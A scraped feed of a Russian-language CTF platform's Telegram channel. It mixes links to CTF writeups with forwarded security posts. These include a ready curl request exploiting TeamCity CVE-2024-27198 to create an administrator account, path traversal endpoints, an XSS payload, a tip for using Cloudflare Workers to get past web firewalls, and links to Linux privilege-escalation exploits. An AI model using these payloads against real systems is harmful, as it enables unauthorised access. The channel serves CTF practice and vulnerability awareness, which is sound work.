TaipanByte CTF
797 subscribers
139 photos
4 videos
1 file
130 links
Time unlimited CTF platform
https://ctf.taipanbyte.ru

По любым вопросам можете обращаться сюда
@taipanbyte_support

Сайт визитка
https://taipanbyte.ru

Общаемся тут
https://discord.com/invite/StETGjUgD7

Чатик ТГ вот
https://t.iss.one/+bR83UROiHPI5MzMy
Download Telegram
Forwarded from PurpleBear (Vadim Shelest)
Давно уже мы не обсуждали новые уязвимости, поэтому сегодня у нас свеженькая RCE - CVE-2024-27198 (оценка по CVSS=9.8) и path traversal - CVE-2024-27199 (оценка по CVSS=7.3) в TeamCity CI/CD от JetBrains

Думаю, что прямо из названия TeamCity CI/CD в целом уже понятно назначение данного продукта, но если нужны детали в качестве предисловия, то можно посмотреть по ссылке на прошлый обзор критичной баги в этом решении.

Позавчера в блоге Rapid7 были опубликованы технические детали эксплуатации этих уязвимостей:

CVE-2024-27198
- байпас аутентификации из-за недостатка логики проверки аутентификации для методов класса jetbrains.buildServer.controllers.BaseController библиотеки web-openapi.jar. Эксплуатация которых позволяет получить возможность доступа к приложению с правами администратора с помощью создания новой учетки или нового значения access token для существующей учетной записи. Уязвимость возникает при обращении к несуществующей странице c параметром запроса jsp=/app/rest/users;.jsp

curl -ik https://target.com/hax?jsp=/app/rest/users;.jsp -X POST -H "Content-Type: application/json" --data "{\"username\": \"haxor\", \"password\": \"haxor\", \"email\": \"haxor\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}"


CVE-2024-27199 - тоже про байпас аутентификации, но при обращении к нескольким менее критичным ручкам /res, /update, /.well-known/acme-challenge. При этом запрос с path traversal к этим эндпоинтам, на примере /res/../admin/diagnostic.jsp раскрывает некоторую информацию. А /res/../app/https/settings/uploadCertificate позволяет изменить tls сертификат и https порт веб-сервера /res/../app/https/settings/setPort.
Полный список ручек можно найти в блоге авторов.

⚙️ POC: https://github.com/yoryio/CVE-2024-27198, модуль metasploit https://github.com/rapid7/metasploit-framework/pull/18922
🔎 Sigma правила: https://github.com/rapid7/Rapid7-Labs/blob/main/Sigma/path_traversal_attacks_CVE_2024_27199.yml
🪲 Уязвимые версии ПО: TeamCity до версии 2023.11.4
Рекомендации: Патч уже доступен, необходимо обновиться до версии 2023.11.4

#TeamCity #RCE #CVE-2024-27198
2
🔒 Зашифрованный трафик (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #easy #forensic
🔥2
Forwarded from Proxy Bar
Linux Privilege Escalation Cheatsheet
пыщь
2
🔒 Книжный червь (Codeby) Writeup

Автор: @Keika_7

🔗 Читать далее

#Codeby #writeup #easy #crypto
🔥2
🔒 Кракозябры (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #crypto #easy
🔥2
🔥3
Forwarded from Proxy Bar
%3C/script%20%3E

или
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E

#xss
1
Участвуем в отборке Standoff13
🎉4
Forwarded from Волосатый бублик
#clourdflare #bypass

Сначала хотел что то написать умное, с эпитетами и красивыми речевыми оборотами, но знаю что вы все равно всю эту воду читать не будете, поэтому кратко:

Cloudflare Workers ходит в интернет с тех же IP адресов, которую часто же рекомендуют добавлять в фаерволах как разрешенные, а остальные блокировать.

Итого: Если у вас есть сайт за Cloudflare, вы точно знаете его реальный IP, но мешает вам к нему обратиться правило фаервола, смело пишите Worker. Пример есть в документации и обходите WAF-Ы, воруйте, убивайте и любите гусей!

Наверное можно было написать в Cloudflare и получить "фифти бакс, сир, плиз...", но мне лень!
1👍1🔥1
Forwarded from Proxy Bar
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-1086 Linux LPE
*
Универсальный эксплойт для повышения локальных привилегий , работающий на большинстве ядер Linux между версиями 5.14 и 6.6, Debian, Ubuntu.
*
download

#linux #lpe
1👍1🔥1
Forwarded from Proxy Bar
CVE-2024-28085 - Смешная дырка в Linux 😜
*
Дырке 11 лет, дырка есть в обновлении которое вышло 27 марта 2024 года.
Дырка проверена на Ubuntu 22.04 LTS и Debian 12.5
Но есть ньюанс, нужно уже быть на сервере.
*
В общем почитайте, поддельные sudo запросы
*
POC

#linux #sudo
👍1🔥1
🔒 Хеш-станция (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #misc #medium
🔥31👍1
🔒 ABC (Codeby) Writeup

Автор: @Vespii

🔗 Читать далее

#Codeby #writeup #crypto #easy
1👍1🔥1
🔒 Одноразовый блокнот (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #crypto #medium
❤‍🔥1👍1🔥1
🔒 Криптоинвестор (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #osint #easy
👍1🔥1🤩1
🔒 Исходный код (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #misc #easy
👍1🔥1
Forwarded from Кавычка (Bo0oM)
Короч, чтоб тебя всякие shodan, censys и прочие умники не сканировали, а еще и не попадать под их поисковую выдачу, рекомендую такой дефолтный конфиг для nginx:

server {
listen 80 default_server;
lisetn [::]:80 default_server;
listen 443 ssl http2 default_server;
listen [::] 443 ssl http2 default_server;
ssl_reject_handshake on;

server_name _;

location / {
return 444;
}
}


Че тут делаем?
Слушаем 80 и 443 на ipv4 и ipv6.
Для 443 откланяем все операции SSL handshake, если имя сервера отлично от тех, что есть в других конфигах.
И если соединие установить удалось (и для 80 порта) - рвем соединение (ответ 444 обладает такой фичей).

>
🔥1
🔒 Купоны64 (Codeby) Writeup

Автор: @puzzlejoy

🔗 Читать далее

#Codeby #writeup #web #medium
1🔥1
🔒 Тёмная фантазия (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #stego #easy
👍1🔥1👾1
🔒 Любимый FTP (Codeby) Writeup

Автор: @FaLLenSkiLL

🔗 Читать далее

#Codeby #writeup #misc #easy
👍2🔥1